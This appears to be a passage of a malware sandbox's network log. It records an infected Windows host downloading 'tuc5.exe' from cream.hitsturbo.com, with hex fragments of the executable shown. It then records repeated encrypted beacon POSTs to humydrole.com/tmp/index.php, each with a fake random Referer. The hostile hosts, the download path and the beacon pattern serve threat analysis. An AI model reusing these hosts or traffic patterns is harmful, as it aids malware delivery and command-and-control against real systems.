Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49759	104.21.46.59	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:12:42.825407982 CET	171	OUT	GET /order/tuc5.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: cream.hitsturbo.com
Dec 22, 2023 21:12:43.294846058 CET	1286	IN	Data Raw: 36 e8 5d d6 ff ff 40 0f 84 c9 00 00 00 2d 81 00 00 00 73 02 33 c0 6a 00 6a 00 50 ff 36 e8 79 d6 ff ff 40 0f 84 ad 00 00 00 6a 00 8b d4 6a 00 52 68 80 00 00 00 8d 96 4c 01 00 00 52 ff 36 e8 40 d6 ff ff 5a 48 0f 85 8b 00 00 00 33 c0 3b c2 73 4c 80 Data Ascii: 6]@-s3jjP6y@jjRhLR6@ZH3;sLLt@jj+P6/@tg6Hu]"F$O:@~tjjt;~t6tuF R:@3^6sFiFLH3@
Dec 22, 2023 21:12:43.295084000 CET	747	IN	Data Raw: 55 ee 41 40 00 de c9 c1 e8 04 74 0c 8d 04 80 db 2c 45 84 42 40 00 de c9 c3 f7 d8 3d 00 14 00 00 7d 42 8b d0 83 e2 1f 8d 14 92 db 2c 55 b8 40 40 00 de f9 c1 e8 05 74 e0 8b d0 83 e2 0f 74 0c 8d 14 92 db 2c 55 ee 41 40 00 de f9 c1 e8 04 74 c8 8d 04 Data Ascii: UA@t,EB@=}B,U@@tt,UA@t,EB@-@@?@@@@@P@$@@ @(k@ @@C#@&@
Dec 22, 2023 21:12:43.382014990 CET	1286	IN	Data Raw: c6 05 33 c0 40 00 02 c6 05 34 c0 40 00 02 c6 05 35 c0 40 00 03 66 c7 05 dc c3 40 00 00 00 66 c7 05 ec c3 40 00 01 00 e8 fe e4 ff ff b8 38 c0 40 00 ba 98 43 40 00 e8 b8 f8 ff ff b8 04 c2 40 00 ba 98 43 40 00 e8 a9 f8 ff ff 33 c0 5a 59 59 64 89 10 Data Ascii: 3@4@5@f@f@8@C@@C@3ZYYdhC@m_^[]%X@%T@%P@%L@%H@%@%@%@%@%@%@%@%@%@%@%@%@
Dec 22, 2023 21:12:43.382072926 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 48 40 00 0c 00 00 00 50 46 40 00 c4 29 40 00 ac 28 40 00 d4 28 40 00 18 29 40 00 0a 45 4d 61 74 68 45 72 72 6f 72 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 48 Data Ascii: dH@PF@)@(@(@)@EMathErrorH@dH@)@(@(@)@EInvalidOpH@dH@)@(@(@)@EZeroDivide$I@dH@)@(@(@)@EOverf
Dec 22, 2023 21:12:43.382152081 CET	1286	IN	Data Raw: 7c 0f ff 83 e1 03 fd f3 a4 83 ee 03 83 ef 03 89 d1 c1 e9 02 f3 a5 fc 5f 5e c3 57 56 53 89 c6 89 d7 89 cb 30 c0 85 c9 74 05 f2 ae 75 01 41 29 cb 89 f7 89 d6 89 fa 89 d9 c1 e9 02 f3 a5 89 d9 83 e1 03 f3 a4 aa 89 d0 5b 5e 5f c3 8d 40 00 57 50 89 c7 Data Ascii: \|_^WVS0tuA)[^_@WP0_uH_W0Ou@_@SV^[SV~D$ D$$T$ 3(^[SV
Dec 22, 2023 21:12:43.382164001 CET	1286	IN	Data Raw: 04 00 8b c0 53 56 57 51 8b d9 8b f2 8b f8 6a 02 8d 44 24 04 50 56 57 e8 ec f1 ff ff 85 c0 7e 05 8a 04 24 eb 02 8b c3 5a 5f 5e 5b c3 55 8b ec 83 c4 f0 53 56 57 33 c0 89 45 f4 89 45 f0 33 c0 55 68 a6 53 40 00 64 ff 30 64 89 20 e8 d8 f1 ff ff 89 45 Data Ascii: SVWQjD$PVW~$Z_^[USVW3EE3UhS@d0d E@@EPUMSDJE5UEPUMS8JEUCu@8@CUEPU
Dec 22, 2023 21:12:43.382174969 CET	1286	IN	Data Raw: 24 44 50 68 9e ff 00 00 a1 14 c0 40 00 50 e8 ef ed ff ff 6a 04 8d 94 24 ac 01 00 00 8b 06 e8 ff d0 ff ff 8d 84 24 ac 01 00 00 89 84 24 84 01 00 00 c6 84 24 88 01 00 00 04 8d 44 24 04 89 84 24 8c 01 00 00 c6 84 24 90 01 00 00 06 8b c5 e8 1f ff ff Data Ascii: $DPh@Pj$$$$D$$$$$$$$$$T$D$oj@D$DPh@PT=1@t$@P8h D$DP$Pj
Dec 22, 2023 21:12:43.382419109 CET	1286	IN	Data Raw: b2 01 b8 c0 4b 40 00 e8 44 fd ff ff 8b f0 89 5e 0c 33 c0 5a 59 59 64 89 10 68 7e 5c 40 00 8d 45 e4 e8 22 d5 ff ff c3 e9 80 d1 ff ff eb f0 8b c6 5f 5e 5b 8b e5 5d c3 90 e8 3b fa ff ff b8 01 00 00 00 e8 99 e1 ff ff c3 b9 87 ff 00 00 b2 01 b8 dc 46 Data Ascii: K@D^3ZYYdh~\@E"_^[];F@T@@Z@@\@PF@@@[@@[@@l$TtD$\|@d'@v:k:@?INFNANUWVSEu
Dec 22, 2023 21:12:43.382431030 CET	1286	IN	Data Raw: c1 89 55 e8 eb bc c6 45 f8 01 eb b6 8a e0 ac 3a c4 74 af 0a c0 75 f7 eb 14 ac 3c 2d 74 04 3c 2b 75 a1 c6 45 f4 01 ac 3c 30 74 fb eb 96 89 55 ec 83 7d e8 ff 75 03 89 55 e8 8b 45 e8 2b c1 7e 02 33 c0 89 45 e0 8b 45 e8 2b c3 7d 02 33 c0 89 45 e4 5b Data Ascii: UE:tu<-t<+uE<0tU}uUE+~3EE+}3E[}tE3E;EEU+UEUu}]}t;uu-<#t'<0t#<.t<,t<'t<"t<Et$<et <;tStOM:tt:&+t-u2AF>0tr
Dec 22, 2023 21:12:43.382452011 CET	1286	IN	Data Raw: d3 e8 de cc ff ff 5e 5b c3 8b c6 8b d3 e8 be cb ff ff 5e 5b c3 00 00 00 ff ff ff ff 01 00 00 00 5c 00 00 00 53 56 8b f2 8b d8 8a 44 33 ff 50 e8 04 de ff ff 85 c0 74 13 8b c3 e8 59 cc ff ff 3b f0 7d 08 b8 02 00 00 00 5e 5b c3 b8 01 00 00 00 5e 5b Data Ascii: ^[^[\SVD3PtY;}^[^[<\t</t3USVW3]M3Uh4g@d0d uED EPICUE"3ZYYdh;g@Ee_^[YY]SVWUQ$
Dec 22, 2023 21:12:43.454087973 CET	1286	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:12:43 GMT Content-Type: application/octet-stream Content-Length: 7599903 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=tuc5.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=goVlPJG%2FVO1VWKZcosMCBOG8BicahIC%2FD6FGdg3qIVK2HXMluqv9Taq2f9iBWe5K0i9XicuXzt5MNtpRjJ0RmQK3TamF25MFTTK6l7ouS%2BeZD6gdJEfmoZ3AgqvA%2BMwk1kCBEnrz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b0570098b6dc2-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 bb ed 85 65 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 00 94 00 Data Ascii: MZP@!L!This program must be run under Win32$7PELeF@@@@P,CODEd

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	49762	91.215.85.17	80

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:12:49.458841085 CET	286	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://stualialuyastrelia.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 4431 Host: stualialuyastrelia.net
Dec 22, 2023 21:12:49.458874941 CET	4431	OUT	Data Raw: 48 9d 88 c4 40 62 24 25 5c 02 56 2f 77 ab 56 c0 2d 6c eb 1b 88 1e ab df b7 61 d5 8c 05 f0 df e2 85 a8 80 b1 7d 42 ee b7 d6 2c 6a 34 cc c4 b9 41 dd 0f 7e 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 81 9a c6 a4 19 ba 8a 14 62 cd d6 4f 96 93 c1 0a d9 Data Ascii: H@b$%\V/wV-la}B,j4A~;}f=BbOp&QD{jB+"m]it4JEBP5XO2Ox-Tr{;j9@O 2'`ssf4Sy6U`A
Dec 22, 2023 21:12:49.751641035 CET	599	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:12:49 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49776	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:04.011300087 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ovugbcxqqoymuyn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 273 Host: humydrole.com
Dec 22, 2023 21:13:04.011337042 CET	273	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4f 37 e7 ec Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA .[k,vuO7I_GNqYRruR("^&&NAJ$'YPtR@+'aWNqm~?-X-a$z\|wL:+8eKR
Dec 22, 2023 21:13:04.979134083 CET	253	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:13:04 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 8 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 04 00 00 00 72 e8 85 eb Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49778	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:05.463593006 CET	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wkyincxfgpf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 232 Host: humydrole.com
Dec 22, 2023 21:13:05.463639021 CET	232	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 25 44 d3 ae Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vu%DQ7OOdsttH)3?+cF"ox]C36"rB<X[KD)M'a.0J\EdhO\|Hn@llac^Wr
Dec 22, 2023 21:13:06.832185984 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:13:06 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49780	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:07.158648014 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lqlayuskwdbfvgb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 179 Host: humydrole.com
Dec 22, 2023 21:13:07.158682108 CET	179	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 39 53 ef 83 Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vu9SgRw{*Z6+DL#D-iF34'XUeJ">t&d'jOZ
Dec 22, 2023 21:13:08.203264952 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:13:07 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49781	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:08.533767939 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vsvxhnlcwxisfly.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 129 Host: humydrole.com
Dec 22, 2023 21:13:08.533796072 CET	129	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 22 22 a2 aa Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vu""xJoNW-R9Dj7g9
Dec 22, 2023 21:13:09.467631102 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:13:09 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49782	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:09.790783882 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jffyddbhqygq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 185 Host: humydrole.com
Dec 22, 2023 21:13:09.790822983 CET	185	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 58 5e c4 ea Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vuX^:QbMwpHQ05Fp*0a6[[Gx )WBoXBS4EM
Dec 22, 2023 21:13:10.394005060 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:13:10 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49783	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:10.715583086 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nwexkfekmyrsjcw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 301 Host: humydrole.com
